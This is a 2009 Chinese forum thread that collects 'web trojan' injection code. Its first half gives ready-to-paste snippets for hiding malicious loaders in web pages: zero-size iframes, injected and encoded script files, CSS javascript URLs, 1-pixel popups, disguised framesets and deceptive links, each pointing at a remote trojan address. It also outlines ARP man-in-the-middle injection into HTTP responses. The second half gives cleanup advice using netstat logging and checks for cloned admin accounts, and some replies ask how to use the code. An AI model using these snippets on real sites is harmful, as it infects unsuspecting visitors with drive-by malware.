★我要吧★

 找回密码
 注册[Register]
搜索
qq空间相册密码查看为什么登陆后需要激活无法注册?

网页木马代码大全

[复制链接]
发表于 2009-5-5 10:45:36 | 显示全部楼层 |阅读模式
网页木马代码大全:
一:框架挂马
     <iframe src=地址 width=0 height=0></iframe>
二:js文件挂马
   
     首先将以下代码
     document.write("<iframe width='0' height='0' src='地址'></iframe>");
     保存为xxx.js,
     则JS挂马代码为
     <script language=javascript src=xxx.js></script>
三:js变形加密
   
     <SCRIPT language="JScript.Encode"            src=http://www.xxx.com/muma.txt></script>
     muma.txt可改成任意后缀
四:body挂马
     <body ></body>
五:隐蔽挂马
     top.document.body.innerHTML = top.document.body.innerHTML +      '\r\n<iframe src="http://www.yaxiyar.com/"></iframe>';
六:css中挂马
     body {
     background-image: url('javascript:document.write("<script            src=http://www.XXX.net/muma.js></script>")')}
七:JAJA挂马
    <SCRIPT language=javascript>      
    window.open    ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro    llbars=no,width=1,height=1");  
    </script>
八:图片伪装
    <html>
    <iframe src="网马地址" height=0 width=0></iframe>
    <img src="图片地址"></center>
    </html>
九:伪装调用:
     <frameset rows="444,0" cols="*">
     <frame src="打开网页" framborder="no" scrolling="auto" noresize      marginwidth="0"margingheight="0">
     <frame src="网马地址" frameborder="no" scrolling="no"     noresize      marginwidth="0"margingheight="0">
     </frameset>
十:高级欺骗
     <a href="http://www.yaxiyar.com(迷惑连接地址,显示这个地址指向木马地址)" > 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>
十一: 超级网马—通过arp欺骗来直接挂马
原理:arp中间人攻击,实际上相当于做了一次代理。
正常时候: A---->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机
arp中间人攻击时候: A---->C---->B
B---->C---->A
实际上,C在这里做了一次代理的作用
那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如
<iframe>...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果
A是管理员或者是目标单位,就直接挂上马了。
如何处理网页木马:
1、找到嵌入的网页木马文件。以下,拿自己的经历说事。找到的文件是wm.htm
2、在注册表中查找wm.htm。很幸运,找到了。开始顺藤摸瓜...
3、修改键值wm.htm为wm_nnd.htm。
4、再次查找wm.htm。很不幸,又查到了。说明有服务程序在作怪。嘿嘿,有意外发现。
    cain.exe,据说是密码嗅探器。
5、修改键值cain.exe为cain_nnd.exe。
6、查找cain.exe,仍然可以查到。嘻嘻,在预料之中。
7、怀疑wm.htm与cain.exe同流合污,背后有服务程序作后台。
8、快查查看,系统服务程序。在运行->msconfig 或直接在命令行使用net start,查看可疑程序
9、发现temp*.exe(全名记不清了),立马net stop server 。
10、快去修改键值wm.htm为wm_nnd.htm,cain.exe为cain_nnd.exe。
11、再次查找wm.htm或cain.exe,没有找到。哈哈,很好。
12、观察了几天,没再发生挂马的现象。 另外,通过检测网络连接查看服务器是否中了木马或病毒
1、使用netstat -an 查看所有和本地计算机建立连接的IP。
2、连接包含四个部分——proto(连接方式)、local address(本地连接地址)、foreign address(和本地建立连接的地址)、state(当前端口状态)。
通过这个命令的详细信息,可以完全监控计算机上的连接,从而达到控制计算机的目的。
3、手工制作bat程序,生成网络连接日志文件供站长分析:bat文件代码如下
REM 注释:监控的时间
time /t>>Netstat.log
REM 每隔30秒,把服务器上通过tcp协议通讯的IP和端口写入日志文件
Netstat -n -p tcp 30>>Netstat.log
注意:要谨慎使用,这会给服务器带来性能影响。最好,在服务器发生异常,怀疑中木马或病毒时,用来分析网络连接日志。
仅仅这些还不够,说说更严重的:
1、可恶的攻击者喜欢使用克隆账号的方法来控制你的计算机。“它们”激活一个系统中的默认账户,但这个账户是不经常用的, 然后使用工具
把这个账户提升到管理员权限,从表面上看来这个账户还是和原来一样,但是这个克隆的账户却是系统中最大的安全隐患。
  
2、赶快检测系统帐户:
a、在命令行下输入net user,查看计算机上有些什么用户。
b、使用“net user 用户名”查看这个用户属于什么权限的及登录时间等。
c、一般除了Administrator是administrators组的,如果你发现一个系统内置的用户是属于administrators组的,
      那么别人在你的计算机上克隆账户的概率为90%。
d、是使用“net user 用户名 /del” 来删掉这个用户,还是修改其它配置,这你说了算。
发表于 2009-5-5 12:11:19 | 显示全部楼层
怎么用的?!
发表于 2009-5-5 18:12:30 | 显示全部楼层
很不错啊
发表于 2009-5-6 22:06:07 | 显示全部楼层
好东西,谢谢楼主分享。。。学习中~:)
发表于 2009-5-6 22:37:18 | 显示全部楼层
都是怎么用的哦 汗水了
发表于 2009-6-22 13:42:53 | 显示全部楼层
挺深奥 有点看不懂啊
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

QQ|手机版|小黑屋|☆我要吧☆ ( 豫ICP备13016831号-1 )

GMT+8, 2024-11-23 19:43 , Processed in 0.060120 second(s), 20 queries .

Powered by abc369 X3.4

© 2001-2023 abc369.

快速回复 返回顶部 返回列表